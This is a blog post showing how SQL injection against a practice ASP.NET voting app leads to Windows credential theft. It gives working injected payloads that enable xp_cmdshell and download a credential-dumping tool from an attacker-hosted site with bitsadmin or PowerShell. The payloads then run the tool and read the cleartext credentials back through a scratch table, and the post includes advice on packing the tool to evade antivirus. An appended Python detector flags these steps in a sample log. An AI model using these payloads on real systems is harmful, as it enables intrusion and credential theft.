Monday, September 2, 2013

Get credentials of system through Sql Injection

I was wondering how to get the credentials and RDP into the system through a SQL injection. To practice the SQL injection I have created a test voting application (ASP.NET 4.5). It can be downloaded at: https://github.com/ka3hk/web_attacks

Here are the steps to get the credentials through SQL injection:

  1. Enable xp_cmdshell 
  2. Download WCE onto the machine 
  3. Get the IP address
  4. Run WCE as the administrator and output to a text file
  5. Read the data from the output file

1. Enable xp_cmdshell

xp_cmdshell allows command execution on Windows-based systems. It is disabled by default, so it has to be enabled first. It can be enabled with this command:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Now we should be able to run commands through SQL. The format is:

execute xp_cmdshell 'command'

Reading the output from xp_cmdshell is slightly tricky. This can be done in three steps:
  • Create a new table (say iip) with one column and insert the output of xp_cmdshell into that table
  • Read the data from the table iip using a UNION
  • Delete the table iip
Here is an example of using xp_cmdshell to get the IP using ipconfig:
  • create table iip(line varchar(2000));insert into iip  execute xp_cmdshell 'ipconfig'
  • union select 2,line,'a',2 from iip
  • drop table iip

2. Download WCE onto the machine

WCE (Windows Credentials Editor) is an awesome tool which can be used to dump credentials in clear text. You will need to run it as administrator. Most AVs have blacklisted the tool. 
I used the packer mpress (the UPX packer should work as well) to pack this executable to avoid detection. 

Check this executable for AV. 
Host this exe on an internet site or some place the SQL server can reach. Use the bitsadmin command line below to download the file; PowerShell can be used as well. 

bitsadmin /transfer mydownloadjob  /download /priority normal http://yoursite destination

$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile("source","dest")

3. Get the IP

Use xp_cmdshell to get the IP:
execute xp_cmdshell 'ipconfig'

4. Run WCE as admin and output data to a file

WCE should be run as an admin, and it was hard to read the output directly from WCE through SQL. So I sent the output to a file, and later read the values from the output file into a table in the database. 

WCE command
C:\temp\wce_mp.exe -w > C:\temp\output.txt

SQL command
k3';create table iip(line varchar(2000));insert into iip  execute xp_cmdshell 'C:\temp\wce_mp.exe -w > C:\temp\output.txt';--

5. Read data from the file

The data can be read using the Windows command type:
type file.txt

SQL command to read the output
k3';insert into iip  execute xp_cmdshell 'type C:\temp\output.txt';--
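From the defender's side, every stage above leaves a distinctive statement in a SQL Server audit or application query log: the sp_configure toggles, stacked queries terminated with a comment, xp_cmdshell invocations carrying a download utility, and the scratch table read back with a UNION. The following detector is an added example (not part of the original post or the test application); it runs a small rule set over constructed log lines modelled on the statements in this post and reports whether the enable-then-execute chain is present.

```python
import re
from collections import Counter

# Constructed sample query log (not captured from a real server): one statement per line,
# as an application-side query logger or SQL Server Audit might record them.
SAMPLE_LOG = [
    "2013-09-02 10:01:05 app_user SELECT name FROM candidates WHERE id = 3",
    "2013-09-02 10:02:11 app_user SELECT name FROM candidates WHERE id = 'k3';EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--'",
    "2013-09-02 10:02:12 app_user SELECT name FROM candidates WHERE id = 'k3';EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--'",
    "2013-09-02 10:03:40 app_user SELECT name FROM candidates WHERE id = 'k3';create table iip(line varchar(2000));insert into iip execute xp_cmdshell 'bitsadmin /transfer j /download /priority normal http://example.invalid/a.exe C:/temp/a.exe';--'",
    "2013-09-02 10:04:02 app_user SELECT name FROM candidates WHERE id = 'k3' union select 2,line,'a',2 from iip--'",
    "2013-09-02 10:05:00 app_user SELECT name FROM candidates WHERE id = 'k3';insert into iip execute xp_cmdshell 'type C:/temp/output.txt';--'",
    "2013-09-02 10:06:00 app_user SELECT name FROM candidates WHERE id = 4",
]

# Each rule is (name, pattern). The patterns match the SQL primitives the post relies on,
# not a specific payload, so re-ordered or re-quoted variants still hit.
RULES = [
    ("advanced_options_toggle", re.compile(r"sp_configure\s*'show advanced options'\s*,\s*1", re.I)),
    ("xp_cmdshell_enable", re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I)),
    ("xp_cmdshell_exec", re.compile(r"\bexec(?:ute)?\s+(?:master\.\.)?xp_cmdshell\b", re.I)),
    ("download_utility", re.compile(r"\b(bitsadmin|powershell|System\.Net\.WebClient)\b", re.I)),
    ("stacked_query_comment", re.compile(r";.*--")),
    ("scratch_table_exfil", re.compile(r"\b(create|drop)\s+table\b|\bunion\s+select\b", re.I)),
]

def classify_line(line):
    """Return the set of rule names that match a single log line."""
    return {name for name, pat in RULES if pat.search(line)}

def scan_log(lines):
    """Scan an iterable of log lines.
    Returns (flagged, counts): flagged is a list of (line_no, sorted rule names)
    for every line that hit at least one rule; counts totals hits per rule."""
    flagged, counts = [], Counter()
    for no, line in enumerate(lines, 1):
        hits = classify_line(line)
        if hits:
            flagged.append((no, sorted(hits)))
            counts.update(hits)
    return flagged, counts

def command_execution_chain(counts):
    """True when the log shows xp_cmdshell being enabled and then actually used,
    which is the sequence that turns a SQL injection into OS command execution."""
    return counts["xp_cmdshell_enable"] > 0 and counts["xp_cmdshell_exec"] > 0

if __name__ == "__main__":
    flagged, counts = scan_log(SAMPLE_LOG)
    for no, hits in flagged:
        print(f"line {no}: {', '.join(hits)}")
    print("xp_cmdshell enable-then-execute chain:", command_execution_chain(counts))
```

The same checks can be run live against a server by querying sys.configurations for the value of 'xp_cmdshell', which should be 0 on an application database server that never needs OS command execution.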

I have created a video for the exploit. 
